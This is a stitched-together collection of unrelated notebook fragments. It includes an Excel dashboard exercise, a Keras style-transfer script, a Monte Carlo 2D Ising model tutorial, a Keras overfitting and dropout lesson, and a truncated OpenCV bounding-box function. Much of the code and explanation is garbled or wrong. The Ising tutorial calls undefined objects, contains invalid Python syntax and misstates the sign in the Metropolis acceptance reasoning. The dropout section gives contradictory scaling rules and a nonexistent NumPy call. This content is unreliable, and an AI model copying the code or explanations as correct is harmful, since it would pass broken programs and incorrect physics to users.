=average(Fatalities)
## Dashboard Controls
A dashboard is like a control panel. Look at ways to allow a user to use this control panel to get different results from your dashboard.
### Setting up your data
In this task, you are going to use data from the ASX for a Company that sells shark repellent systems and prepare it for charting. The first step is to tidy up and format the data.
INSTRUCTIONS
Remove the blank row and standardize your decimal places.
Ensure the current date has is has the same format as the dates in column.
See chapter1_6
### Format numbers within your dataset
In your next task you will edit the numbers in your dataset so that they are all formatted the same way.
INSTRUCTIONS
Format the numbers in the Volume column so that they all include commas to label thousands.
also See chapter1_6
### Creating and testing the data validation
With your data optimized and your named ranges set up, in this task you will set up a data validation to allow a user to select a date from a list.
INSTRUCTIONS
Enter in the heading SM8 Smart Marine Systems ASX in A15.
Starting in A16, enter in the column headings Date, Open, High, Low and Close.
Create a data validation using the named range Dates in A17:26. **Click Data -> Data validation -> cell range is A17:26 -> another range choose the named range 'Dates'**
Ensure the following text is available for those who need help: Select a date from the list to see Opening and Closing prices.
| github_jupyter |
```
# 定义初始变量
from keras.preprocessing.image import load_img, img_to_array
target_image_path = '/home/fc/Downloads/fengjing.jpg'
style_reference_image_path = '/home/fc/Downloads/fangao_xinkong.jpg'
width, height = load_img(target_image_path).size
img_height = 400
img_width = int(width * img_height / height)
# 辅助函数
import numpy as np
from keras.applications import vgg19
def preprocess_image(image_path):
img = load_img(image_path, target_size=(img_height, img_width))
img = img_to_array(img)
img = np.expand_dims(img, axis=0)
img = vgg19.preprocess_input(img)
return img
def deprocess_image(x):
x[:, :, 0] += 103.939
x[:, :, 1] += 116.779
x[:, :, 2] += 123.68
x = x[:, :, ::-1]
x = np.clip(x, 0, 255).astype('uint8')
return x
# 加载预训练的 VGG19 网络,并将其应用于三张图像
from keras import backend as K
target_image = K.constant(preprocess_image(target_image_path))
style_reference_image = K.constant(preprocess_image(style_reference_image_path))
combination_image = K.placeholder((1, img_height, img_width, 3))
input_tensor = K.concatenate([target_image,
style_reference_image,
combination_image], axis=0)
model = vgg19.VGG19(input_tensor=input_tensor,
weights='imagenet',
include_top=False)
print('Model loaded.')
# 内容损失
def content_loss(base, combination):
return K.sum(K.square(combination - base))
# 风格损失
def gram_matrix(x):
features = K.batch_flatten(K.permute_dimensions(x, (2, 0, 1)))
gram = K.dot(features, K.transpose(features))
return gram
def style_loss(style, combination):
S = gram_matrix(style)
C = gram_matrix(combination)
channels = 3
size = img_height * img_width
return K.sum(K.square(S - C)) / (4. * (channels ** 2) * (size ** 2))
# 总变差损失
def total_variation_loss(x):
a = K.square(
x[:, :img_height - 1, :img_width - 1, :] -
x[:, 1:, :img_width - 1, :])
b = K.square(
x[:, :img_height - 1, :img_width - 1, :] -
x[:, :img_height - 1, 1:, :])
return K.sum(K.pow(a + b, 1.25))
# 定义需要最小化的最终损失
outputs_dict = dict([(layer.name, layer.output) for layer in model.layers])
content_layer = 'block5_conv2'
style_layers = ['block1_conv1',
'block2_conv1',
'block3_conv1',
'block4_conv1',
'block5_conv1']
total_variation_weight = 1e-4
style_weight = 1.
content_weight = 0.025
loss = K.variable(0.)
layer_features = outputs_dict[content_layer]
target_image_features = layer_features[0, :, :, :]
combination_features = layer_features[2, :, :, :]
loss += content_weight * content_loss(target_image_features,
combination_features)
for layer_name in style_layers:
layer_features = outputs_dict[layer_name]
style_reference_features = layer_features[1, :, :, :]
combination_features = layer_features[2, :, :, :]
sl = style_loss(style_reference_features, combination_features)
loss += (style_weight / len(style_layers)) * sl
loss += total_variation_weight * total_variation_loss(combination_image)
# 设置梯度下降过程
grads = K.gradients(loss, combination_image)[0]
fetch_loss_and_grads = K.function([combination_image], [loss, grads])
class Evaluator(object):
def __init__(self):
self.loss_value = None
self.grads_values = None
def loss(self, x):
assert self.loss_value is None
x = x.reshape((1, img_height, img_width, 3))
outs = fetch_loss_and_grads([x])
loss_value = outs[0]
grad_values = outs[1].flatten().astype('float64')
self.loss_value = loss_value
self.grad_values = grad_values
return self.loss_value
def grads(self, x):
assert self.loss_value is not None
grad_values = np.copy(self.grad_values)
self.loss_value = None
self.grad_values = None
return grad_values
evaluator = Evaluator()
# 风格迁移循环
from scipy.optimize import fmin_l_bfgs_b
from scipy.misc import imsave
import time
result_prefix = 'my_result'
iterations = 20
x = preprocess_image(target_image_path)
x = x.flatten()
for i in range(iterations):
print('Start of iteration', i)
start_time = time.time()
x, min_val, info = fmin_l_bfgs_b(evaluator.loss,
x,
fprime=evaluator.grads,
maxfun=20)
print('Current loss value:', min_val)
img = x.copy().reshape((img_height, img_width, 3))
img = deprocess_image(img)
fname = result_prefix + '_at_iteration_%d.png' % i
imsave(fname, img)
print('Image saved as', fname)
end_time = time.time()
print('Iteration %d completed in %ds' % (i, end_time - start_time))
```
| github_jupyter |
# Monte Carlo 2D Ising Model
Authors: Chris King, James Grant
This tutorial aims to help solidify your understanding of the theory underlying the Monte Carlo simulation technique by applying it to model the magnetic properties of a 2D material.
```
# import everything that we will need in this tutorial now
import numpy
import matplotlib.pyplot as plt
from inputs.Tut_2.sources.ising import IsingModel
from inputs.Tut_2.sources.isingdata import IsingModelData
```
## Introduction to Monte Carlo Methods:
Monte Carlo (MC) is the name given to the simulation technique that attempts to solve a problem by randomly sampling out of all of its possible outcomes ('configurational space')and obtaining a result based on numerical analysis of the sampling. MC is a stochastic method, which means that the final state of the system cannot be predicted precisely based on the initial state and parameters, but through numerical analysis, reproducible results can be obtained. This contrasts with other techniques like molecular dynamics, which are deterministic, where if you know the initial state and the inputs for the calculations, you can predict what the configuration of the system will be at any and all times thereafter. This distinction allows MC to be used in a variety of applications across the scientific community where deterministic techniques are ineffective or impossible to use, such as phase co-existence and criticality, adsorption, and development of solid-state defects [1].
Results from MC simulations are generally accurate and reliable, assuming that the technique has representatively sampled the distribution of possible configurations in the system ('configurational space'). In other words, if our sampling method returns the probability distribution we expect, then we know that are sampling method is reliable. In thermodynamic systems, the probability distribution of available states is given by the Boltzmann distribution:
$$W(\mathbf{r}) = \exp {\Bigl(\frac{E}{kT}\Bigr)}$$
where $W(\mathbf{r})$ is the probability of being in a state of energy, also known as the statistical weight, *E*, at temperature, *T*, and *k* is the Boltzmann constant. The ratio of Boltzmann distributions at two different energies, $E_2$ and $E_1$, is known as the Boltzmann factor:
$$\frac{W(\mathbf{r}_1)}{W(\mathbf{r}_2)} = \exp {\Bigl(\frac{E_2 -E_1}{kT}\Bigr)}$$
So if our sampling method yields the Boltzmann distribution, we know that our simulation accurately reflects real systems. There are many possible ways one can sample the configurational space of a simulated system, the intuitive case is simple random sampling in that we move randomly from one configuration to another. However, this process is only reliable in systems with a constant probability distribution of states as it does not take into account the respective weighting of a given configuration. For example, it can under-represent a small number of configurations who contribute significantly to the overall state of the system.
The concept of statistical weight is crucial in thermodynamics and describes how likely a particular configuration is of being observed out of a hypothetically *large* number of replicas of that system. For instance, consider the possible configurations of the gas molecules in this room, clearly, this system would have a high probability of being in a configuration where the gas molecules are evenly (on average) distributed throughout the volume of the room and so this configuration has a high weighting. Yet, there is a configuration where every gas molecule sits in one corner of the room, this configuration is highly unlikely to be seen and so its weighting is very low. The weight of a particular configuration is given by:
$$W(\mathbf{r}) = \frac{\exp {\Bigl(\frac{- E(\mathbf{r})}{kT}\Bigr)}}{\sum_{i} \exp {\Bigl(\frac{- E(\mathbf{r_{i}})}{kT}\Bigr)} }$$
where $E(\mathbf{r})$ is the energy of a configuration $\mathbf{r}$. In MC simulations, the statistical weight of moving from a configuration, $\mathbf{r_1}$, to a new configuration, $\mathbf{r_2}$, is:
$$W(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = \frac{W(\mathbf{r_1})P(\mathbf{r}_1 \rightarrow \mathbf{r}_2)}{N}$$
where $W(\mathbf{r_1})$ is the weight associated with $\mathbf{r}$, $P(\mathbf{r}_1 \rightarrow \mathbf{r}_2)$ is the probability of moving from configuration $\mathbf{r}_1$ to $\mathbf{r}_2$ and *N* is the number of possible configurations. The corresponding weight of going from $\mathbf{r}_2$ back to $\mathbf{r}_1$ is:
$$W(\mathbf{r}_2 \rightarrow \mathbf{r}_1) = \frac{W(\mathbf{r_2})P(\mathbf{r}_2 \rightarrow \mathbf{r}_1)}{N}$$
<img src="images/Tut_2_images/weights.png" height='400' width='600'/>
<div style="text-align: center">**Figure 1:** The associated statistical weights of moving between two configurations, A and B.</div>
There are more sophisticated ways of sampling configurational space, such as the Metropolis Algorithm, which is one of the most widely used sampling schemes in MC simulations (including this one). First, it randomly selects a particle in the system and proposes a move to another configuration. It then calculates the new energy of the configuration and compares it with the energy of the previous configuration before the move was proposed. It then applies the following condition:
$$P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = \min(1, \exp \ \Bigl(- \frac{E(\mathbf{r}_2) - E(\mathbf{r}_1)}{kT}\Bigr) \ )$$
where $P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2)$ is the probability of accepting the move from the initial configuration, $\mathbf{r}_1$, with an energy, $E(\mathbf{r}_1)$, to the new configuration, $\mathbf{r}_2$, with an energy, $E(\mathbf{r}_2)$. The function min() means that the smallest value in the brackets is chosen. If the energy of the new configuration is less than that of the original, *i.e.* $E(\mathbf{r}_2) < E(\mathbf{r}_1)$, then $E(\mathbf{r}_2)-E(\mathbf{r}_1) < 0$ and so $\exp \ \Bigl(- \frac{E(\mathbf{r}_2) - E(\mathbf{r}_1)}{kT}\Bigr) \ > 1$ and so the move is accepted with $P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = 1$. If the new energy is greater than the energy of the original configuration, *i.e.* $E(\mathbf{r}_2) > E(\mathbf{r}_1)$, then $E(\mathbf{r}_2)-E(\mathbf{r}_1) > 0$ and so $\exp \ \Bigl(- \frac{E(\mathbf{r}_2) - E(\mathbf{r}_1)}{kT}\Bigr) \ > 1$ and the move is accepted with probability $P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = \exp \ \Bigl(- \frac{E(\mathbf{r}_2) - E(\mathbf{r}_1)}{kT}\Bigr) \ < 1$.
<img src="images/Tut_2_images/Metropolis_algorithm.png" />
<div style="text-align: center">**Figure 2:** Visual representation of the function of the Metropolis algorithm. Once one move outcome is complete, the algorithm repeats on the final configuration. </div>
Even if the proposed move leads to a higher-energy configuration, there is still a non-zero probability of it being accepted! Why should this be the case?
```
a = input()
```
What happens to the total number of accepted moves in a given simulation as we change the temperature? How might this affect the final outcome of your simulation?
```
b = input()
```
This defines the concept of detailed balance:
$$W(\mathbf{r}_1 \rightarrow \mathbf{r}_2)P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = W(\mathbf{r}_2 \rightarrow \mathbf{r}_1)P_{\mathrm{acc}}(\mathbf{r}_2 \rightarrow \mathbf{r}_1)$$
We can now obtain the required Boltzmann distribution from this condition by rearrangement:
$$\frac{W(\mathbf{r}_2 \rightarrow \mathbf{r}_1)}{W(\mathbf{r}_1 \rightarrow \mathbf{r}_2)} = \frac{P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2)}{P_{\mathrm{acc}}(\mathbf{r}_2 \rightarrow \mathbf{r}_1)} = exp \ {\Bigl(\frac{E_2 -E_1}{kT}\Bigr)}$$
This tells us that so long as we satisfy detailed balance, our system will be sampled according to the Boltzmann distribution and obey the rules of thermodynamics. Though it is important to note that the condition of detailed balance is *sufficient* but *not necessary* to ensure that are system accurately reflects thermodynamics, *i.e.* there are other simpler conditions one could employ that would ensure that our simulation obeys thermodynamics. For instance, one could ensure that *balance* is achieved from the system which simply states that moving from one state to another state is the same for any initial and final state pairing, *i.e.*:
$$\frac{\mathrm{d}W(\mathbf{r}_1)}{\mathrm{d}t} = 0$$
However, detailed balance also ensures equilibrium between all states such that the trajectory from one configuration to another via several steps has the same probability as the reverse trajectory. This ensures the reliability of the sampling method used without requiring additional corrections in the calculations.
<img src="images/Tut_2_images/detailed_balance2.png" height='700' width='700'/>
<div style="text-align: center">**Figure 3:** A visualisation of the difference between the condition of balance (left) and detailed balance (right) for a set of different configurations, A-H, in the configurational space of a system. </div>
Having discussed the concepts behind MC simulation methods, it is time to demonstrate how to apply them to a physical system. This tutorial will be centred on a MC simulation of the magnetic properties of solid materials.
## Ising Model of Magnetism
An application where MC is more effective than deterministic methods is simulating the magnetic behaviour of solid state materials.
Our simulation will be based on a 2D Ising model, which describes the macroscopic magnetic behaviour of a solid material as a result of the relative orientation of electron spins within the crystal lattice of a material. As you may recall, each electron has an intrinsic 'spin'. In simple terms, the spin of an electron can be thought of as a magnetic moment, with two possible orientations: 'up' and 'down'. This idea helps define two classes of magnetic materials: diamagnetic and paramagnetic.
Diamagnetic materials are made up of atoms/molecules without unpaired electrons, do not interact with external magnetic fields, making them non-magnetic. Paramagnetic materials contain unpaired electrons, exhibiting a net magnetic moment that can interact with external magnetic fields and give the material its magnetic properties. Figure 1 below shows an example of a paramagnetic material as a 2D lattice of colour-coded spins.
<img src="images/Tut_2_images/paramagnet_config.png" />
<div style="text-align: center">**Figure 4:** A 2D schematic of a paramagnetic material under an external magnetic field. Yellow indicates the spins that are aligned with the field and purple are spins that are anti-aligned. </div>
There is another type of magnetism observed known as ferromagnetism, where instead of a uniform alignment of spins as in paramagnetic materials, 'domains' of aligned spins form, bound by domains of oppositely aligned spins (see Figure 2). Ferromagnetic materials can show unique properties, such as being able to generate their own magnetic field (magnetisation) in the absence of an external magnetic field. These form the common magnets seen in real-world applications.
<img src="images/Tut_2_images/ferromagnet_cand2.png" />
<div style="text-align: center">**Figure 5:** A 2D schematic of a ferromagnetic material at $T < T_{c}$. Yellow and purple represent the two different spin orientations, 'up' and 'down', respectively. </div>
The main factor influencing whether a given atom's spin is aligned with its neighbours in a crystal, and hence what type of magnetism the material displays, is its exchange energy, *E*, which in the Ising model is given by:
$$E = -J \sum_{<i,j>} s_{i}s_{j}$$
where *J* is the coupling constant between adjacent atoms in a given material and $s_{i/j}$ is the spin of the particle in position i/j in the lattice, respectively. The <...> here mean the sum goes over the nearest neighbours of the atom in position (i,j), *i.e.* over the atoms at positions (i-1, j), (i+1, j), (i, j-1) and (i, j+1) only. The sign of *J* determines whether spin alignment (ferromagnetism) or anti-alignment (antiferromagnetism) is favourable.
The exchange energy can be thought of as an activation barrier for an atom to change its spin depending on the spins of its neighbours. This means that, like with any physical system with an energy barrier, spontaneous thermal fluctuations can overcome the barrier and cause some atoms/domains to flip their spin, with the likelihood of flipping a spin increasing as temperature increases. Therefore, ferromagnetic materials only show domains at temperatures under a specific critical, or Curie, temperature, $T_{c}$.
Above this point, ferromagnetic materials lose their ability to retain magnetisation because the thermal fluctuations are much larger than the energy required to switch a domain's alignment with respect to other domains. This results in a loss of the domain structure, and hence loss of magnetisation without an external field. It is for this reason that paramagnetism can be thought of as high-temperature ferromagnetism.
For more information on the Ising model, consult either [2] or [3].
The Metropolis algorithm is employed in these simulations, describe what constitutes a 'move' in the context of this system.
```
c = input()
```
Write an expression for the energy difference between the initial and final configurations, $E(\mathbf{r}_2) - E(\mathbf{r}_1)$, for the 2D Ising model.
```
d = input()
```
### Exercise 1)
The aim of this exercise is to familiarise yourself with running MC calculations on a simple 2D Ising model of a ferromagnetic material. The material is represented by a 64x64 2D lattice of points, each representing an atom with its own net spin. In this exercise, all atoms are spin-aligned. We will be running a MC simulation to look at how the overall spin alignment (magnetisation) and energy of the system evolves with both time and temperature.
First, we shall setup our intial simulation at a given temperature:
```
data = dlmonte.DLMonteData("")
```
Now let's run our first Monte Carlo simulation of the day!
```
# Run the initial simulation. Takes about a minute to complete
```
If you wish, you can look in your directory and see several new files have appeared. The nature of these files will be explained in detail next session.
Now that you have all the output data you could possibly need from this calculation, we shall proceed with extracting the time evolution of magnetisation and the distribution of the magnetisations over the course of the simulation.
```
# output data extraction and analysis into plots of magnetisation vs time and histogram of magnetisation distributions
T = 2.36
plt.figure()
plt.subplot(1,2,1)
plt.xlabel("Number of steps")
plt.ylabel("Magnetisation")
plt.title("Time evolution of magnetisation at T = {}".format(T))
plt.axis()
plt.plot(M_seq.dat, 'b-')
plt.savefig("inputs/Tut_2/main/{}/Mvst.png".format(T))
plt.subplot(1,2,2)
plt.xlabel("M")
plt.ylabel("P(M)")
plt.title("Distribution of magnetisations at T = {}".format(T))
plt.hist(M_seq.dat, bins=auto, normed=True, weights=None)
plt.savefig("inputs/Tut_2/main/{}/M_hist.png".format(T))
```
You will find several new files in your directory, but we will have used only on M_seq.dat and M_hist.dat in this exercise (we will get to the others later).
We shall now proceed to run the calculation at higher temperatures to obtain the temperature-dependence of the magnetisation. Repeat the simulation and analysis sections that you have done for this initial temperature with the other temperatures in the main directory.
Compare the evolution of magnetisation as the temperature changes and rationalise any observed trends using your knowledge of ferromagnetism. Do the results correspond to the Ising model?
```
e = input()
```
Compare the shapes of your magnetisation histograms as the temperature changes. What does this indicate is happening to your system as temperature changes? Does this behaviour support the Ising model and your magnetisation evolution data?
```
f = input()
```
Once you have done that, plot magnetisation vs temperature for the system. Comment on the shape of your graph and estimate the critical temperature, $T_{c}$, from it.
```
# collate all magnetisation-temperature data and plot it
plt.figure()
plt.xlabel("Temperature")
plt.ylabel("Average Magnetisation")
plt.title("Magnetisation vs Temperature")
#plt.axis()
plt.plot(x1, y1, 'b-')
plt.savefig("inputs/Tut_2/main/<M>vsT.png".format{T})
g = input()
```
For any square 2D Ising model where coupling along rows and along columns are equal, $T_{c}$ is given by:
$$T_{c} = \frac{2}{\ln(1+\sqrt{2})} \approx 2.269$$
Does your estimation of $T_{c}$ agree with that predicted by the above equation? Account for any observed discrepancies. How could you improve the accuracy of your estimated value for $T_{c}$?
```
h = input()
```
### Extension (optional):
You have seen what happens as the system is heated, but you can also look at the magnetisation upon cooling the system from a state above the critical temperature to a state below the critical temperature.
Go back to the beginning of Exercise 1 and now choose the inputs in ------- and plot the time-evolution of magnetisation.
How does this compare with the time evolution at $T>T_{c}$? Does this agree with the Ising model? If not, what do you think might be the problem with our simulation?
```
i = input()
```
### Exercise 2)
This exercise will demonstrate the stochastic nature of MC simulations as well as how the Metropolis algorithm produces reliable and accurate results for this simple 2D Ising model.
We have seen what happens when we start the simulations from a fixed starting configuration (all spins aligned), but what will happen when we start from a random configuration?
Go back the the beginning of Exercise 1 and repeat it for each temperature in the 'ranseed' folder, plotting the magnetisation vs. temperature once you have run all the simulations.
How do the results from this exercise compare with those of Exercise 1? What effect does the initial configuration have on the outcome of the simulation?
```
j = input()
```
### Extension (optional):
For one of the ranseed calculations, let us find out what the initial configuration was and use that as our fixed starting configuration and see how the results of both calculations compare. Using your current ranseed calculation, we will extract the initial configuration and set it as the starting configuration in the CONTROL file:
```
# pull out seeds, copy input files into a new directory, change ranseed to seeds in output
```
Now let's run this calculation:
```
# Run calculations here
```
We can compare the magnetisation data between the ranseed and this new simulation:
```
# plot both magentisations on the same graph
plt.figure()
plt.xlabel("Number of steps")
plt.ylabel("Magnetisation")
plt.title("Time evolution of magnetisation at T = {} for a randomly-generated initial state and the equivalent fixed initial state".format(T))
plt.axis()
plt.plot(x1, y1, 'b-', label='random', x2, y2, 'r-', label='fixed')
plt.legend()
plt.savefig("inputs/Tut_2/extensions/ranseed/Mvst_comparison.png")
```
What do you notice about the magnetisation evolution in the two calculations? Does this confirm that the stochastic nature of Monte Carlo methods can produce reliable results?
```
k = input()
```
## Conclusions:
Now that you have reached the end of this tutorial, you will hopefully have a better understanding of the Monte Carlo method and the motivation for its use. You have simulated the magnetic properties of a 2D material based on the Ising model and obtained:
- the temperature-dependence of magnetisation
- the evolution of magnetisation with time
- validation of the stochastic nature of Monte Carlo methods
In the next tutorial, you will be introduced to a general Monte Carlo program called DLMONTE and use it to model the thermal properties of a Lennard-Jones material.
## Extensions (optional):
### 1. Antiferromagnetism:
So far, you have looked at how the magnetic behaviour of a ferromagnetic system changes over time and temperature, but there is another possible type of magnetism called antiferromagnetism, where the sign of the coupling constant, *J*, changes sign. This means that it is now favourable for the spin of one atom to be opposed to the spin of its neighbours, resulting in a preferred 'checkerboard' pattern of magnetisation on the 2D lattice (see Figure 3). You can investigate the magnetic behaviour in this case using the 2D Ising model.
<img src="images/Tut_2_images/antiferromagnet.png" />
<div style="text-align: center">**Figure 6:** The most stable magnetic configuration of an antiferromagnetic material at $T < T_{c}$. </div>
Repeat Exercise 1 but this time using the inputs in the 'antiferromagnet' folder, plotting the temperature dependence of the magnetisation once you have run the simulation at each temperature.
Compare your results of the antiferromagnet with the ferromagnet. Rationalise any observed differences in terms of exchange energy and alignment of spins.
```
l = input()
```
## References:
[1] S. Mordechai (Editor), *Applications of Monte Carlo Method in Science and Engineering* [Online]. Available: https://www.intechopen.com/books/applications-of-monte-carlo-method-in-science-and-engineering
[2] J. V. Selinger, "Ising Model for Ferromagnetism" in *Introduction to the Theory of Soft Matter: From Ideal Gases to Liquid Crystals*. Cham: Springer International Publishing, 2016, pp. 7-24.
[3] N. J. Giordano, *Computational Physics*. Upper Saddle River, N.J.: Prentice Hall, 1997.
| github_jupyter |
# Overfitting and underfitting
The fundamental issue in machine learning is the tension between optimization and generalization. "Optimization" refers to the process of adjusting a model to get the best performance possible on the training data (the "learning" in "machine learning"), while "generalization" refers to how well the trained model would perform on data it has never seen before. The goal of the game is to get good generalization, of course, but you do not control generalization; you can only adjust the model based on its training data.
Note: in this notebook we will be using the IMDB test set as our validation set. It doesn't matter in this context.
```
from keras.datasets import imdb
import numpy as np
(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)
def vectorize_sequences(sequences, dimension=10000):
# Create an all-zero matrix of shape (len(sequences), dimension)
results = np.zeros((len(sequences), dimension))
for i, sequence in enumerate(sequences):
results[i, sequence] = 1. # set specific indices of results[i] to 1s
return results
# Our vectorized training data
x_train = vectorize_sequences(train_data)
# Our vectorized test data
x_test = vectorize_sequences(test_data)
# Our vectorized labels
y_train = np.asarray(train_labels).astype('float32')
y_test = np.asarray(test_labels).astype('float32')
```
# Fighting overfitting
## Reducing the network's size
Unfortunately, there is no magical formula to determine what the right number of layers is, or what the right size for each layer is. You will have to evaluate an array of different architectures (on your validation set, not on your test set, of course) in order to find the right model size for your data. The general workflow to find an appropriate model size is to **start with relatively few layers and parameters, and start increasing the size of the layers or adding new layers until you see diminishing returns** with regard to the validation loss.
Let's try this on our movie review classification network. Our original network was as such:
```
from keras import models
from keras import layers
original_model = models.Sequential()
original_model.add(layers.Dense(16, activation='relu', input_shape=(10000,)))
original_model.add(layers.Dense(16, activation='relu'))
original_model.add(layers.Dense(1, activation='sigmoid'))
original_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
```
Now let's try to replace it with this smaller network:
```
smaller_model = models.Sequential()
smaller_model.add(layers.Dense(4, activation='relu', input_shape=(10000,)))
smaller_model.add(layers.Dense(4, activation='relu'))
smaller_model.add(layers.Dense(1, activation='sigmoid'))
smaller_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
```
### Comparison
Here's a comparison of the validation losses of the original network and the smaller network. The dots are the validation loss values of the smaller network, and the crosses are the initial network (remember: a lower validation loss signals a better model).
```
original_hist = original_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
smaller_model_hist = smaller_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
epochs = range(1, 21)
original_val_loss = original_hist.history['val_loss']
smaller_model_val_loss = smaller_model_hist.history['val_loss']
import matplotlib.pyplot as plt
# b+ is for "blue cross"
plt.plot(epochs, original_val_loss, 'b+', label='Original model')
# "bo" is for "blue dot"
plt.plot(epochs, smaller_model_val_loss, 'bo', label='Smaller model')
plt.xlabel('Epochs')
plt.ylabel('Validation loss')
plt.legend()
plt.show()
```
Now, for kicks, let's add to this benchmark a network that has much more capacity, far more than the problem would warrant:
```
bigger_model = models.Sequential()
bigger_model.add(layers.Dense(512, activation='relu', input_shape=(10000,)))
bigger_model.add(layers.Dense(512, activation='relu'))
bigger_model.add(layers.Dense(1, activation='sigmoid'))
bigger_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
bigger_model_hist = bigger_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
```
Here's how the bigger network fares compared to the reference one. The dots are the validation loss values of the bigger network, and the crosses are the initial network.
```
bigger_model_val_loss = bigger_model_hist.history['val_loss']
plt.plot(epochs, original_val_loss, 'b+', label='Original model')
plt.plot(epochs, bigger_model_val_loss, 'bo', label='Bigger model')
plt.xlabel('Epochs')
plt.ylabel('Validation loss')
plt.legend()
plt.show()
```
Meanwhile, here are the training losses for our two networks:
```
original_train_loss = original_hist.history['loss']
bigger_model_train_loss = bigger_model_hist.history['loss']
plt.plot(epochs, original_train_loss, 'b+', label='Original model')
plt.plot(epochs, bigger_model_train_loss, 'bo', label='Bigger model')
plt.xlabel('Epochs')
plt.ylabel('Training loss')
plt.legend()
plt.show()
```
## Adding weight regularization
A "simple model" in this context is a model where the distribution of parameter values has less entropy (or a model with fewer parameters altogether, as we saw in the section above). Thus a common way to mitigate overfitting is to put constraints on the complexity of a network by forcing its weights to only take small values, which makes the distribution of weight values more "regular". This is called "weight regularization", and it is done by adding to the loss function of the network a cost associated with having large weights. This cost comes in two flavors:
- L1 regularization, where the cost added is proportional to the absolute value of the weights coefficients (i.e. to what is called the "L1 norm" of the weights).
- L2 regularization, where the cost added is proportional to the square of the value of the weights coefficients (i.e. to what is called the "L2 norm" of the weights). L2 regularization is also called weight decay in the context of neural networks. Don't let the different name confuse you: weight decay is mathematically the exact same as L2 regularization.
```
from keras import regularizers
l2_model = models.Sequential()
l2_model.add(layers.Dense(16, kernel_regularizer=regularizers.l2(0.001),
activation='relu', input_shape=(10000,)))
l2_model.add(layers.Dense(16, kernel_regularizer=regularizers.l2(0.001),
activation='relu'))
l2_model.add(layers.Dense(1, activation='sigmoid'))
l2_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
```
Here's the impact of our L2 regularization penalty:
```
l2_model_hist = l2_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
l2_model_val_loss = l2_model_hist.history['val_loss']
plt.plot(epochs, original_val_loss, 'b+', label='Original model')
plt.plot(epochs, l2_model_val_loss, 'bo', label='L2-regularized model')
plt.xlabel('Epochs')
plt.ylabel('Validation loss')
plt.legend()
plt.show()
```
As alternatives to L2 regularization, you could use one of the following Keras weight regularizers:
```
from keras import regularizers
# L1 regularization
regularizers.l1(0.001)
# L1 and L2 regularization at the same time
regularizers.l1_l2(l1=0.001, l2=0.001)
```
## Adding dropout
Dropout is one of the most effective and most commonly used regularization techniques for neural networks, developed by Hinton and his students at the University of Toronto. Dropout, applied to a layer, consists of randomly "dropping out" (i.e. setting to zero) a number of output features of the layer during training. Let's say a given layer would normally have returned a vector [0.2, 0.5, 1.3, 0.8, 1.1] for a given input sample during training; after applying dropout, this vector will have a few zero entries distributed at random, e.g. [0, 0.5, 1.3, 0, 1.1]. The "dropout rate" is the fraction of the features that are being zeroed-out; it is usually set between 0.2 and 0.5. At test time, no units are dropped out, and instead the layer's output values are scaled down by a factor equal to the dropout rate, so as to balance for the fact that more units are active than at training time.
Consider a Numpy matrix containing the output of a layer, layer_output, of shape (batch_size, features). At training time, we would be zero-ing out at random a fraction of the values in the matrix:
At training time: we drop out 50% of the units in the output:
layer_output *= np.randint(0, high=2, size=layer_output.shape)
At test time:
layer_output *= 0.5
At training time:
layer_output *= np.randint(0, high=2, size=layer_output.shape)
Note that we are scaling *up* rather scaling *down* in this case:
layer_output /= 0.5
In Keras you can introduce dropout in a network via the Dropout layer, which gets applied to the output of layer right before it, e.g.:
model.add(layers.Dropout(0.5))
Let's add two Dropout layers in our IMDB network to see how well they do at reducing overfitting:
```
dpt_model = models.Sequential()
dpt_model.add(layers.Dense(16, activation='relu', input_shape=(10000,)))
dpt_model.add(layers.Dropout(0.5))
dpt_model.add(layers.Dense(16, activation='relu'))
dpt_model.add(layers.Dropout(0.5))
dpt_model.add(layers.Dense(1, activation='sigmoid'))
dpt_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
dpt_model_hist = dpt_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
```
Let's plot the results:
```
dpt_model_val_loss = dpt_model_hist.history['val_loss']
plt.plot(epochs, original_val_loss, 'b+', label='Original model')
plt.plot(epochs, dpt_model_val_loss, 'bo', label='Dropout-regularized model')
plt.xlabel('Epochs')
plt.ylabel('Validation loss')
plt.legend()
plt.show()
```
## Conclusion
- The general workflow to find an appropriate model size is to start with relatively few layers and parameters, and start increasing the size of the layers or adding new layers until you see diminishing returns with regard to the validation loss.
Here the most common ways to prevent overfitting in neural networks:
- Getting more training data.
- Reducing the capacity of the network.
- Adding weight regularization.
- Adding dropout.
| github_jupyter |
# Bounding box using numpy
```
import numpy as np
from skimage import transform
import matplotlib.pyplot as plt
import cv2
def fill_oriented_bbox(img, fill_threshold=None, color=1):
_, contours, _ = cv2.findContours(img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
out = np.zeros_like(img, dtype=np.uint8)
for cnt in contours:
# Compute the oriented bounding box
rect = cv2.minAreaRect(cnt)
box = cv2.boxPoints(rect)
box = np.int0(box)
obbox = np.zeros_like(img, dtype=np.uint8)
cv2.fillPoly(obbox, [box], color)
if fill_threshold is not None:
# Fill the contour so we can compare it to the oriented bounding box later
cnt_fill = np.zeros_like(img, dtype=np.uint8)
cv2.fillPoly(cnt_fill, [cnt], color)
# Compare the areas and return the filled bounding box only if the ratio is lower than fill_threshold
if (np.sum(obbox) / np.sum(cnt_fill) < fill_threshold):
out = np.where(out > 0, out, obbox)
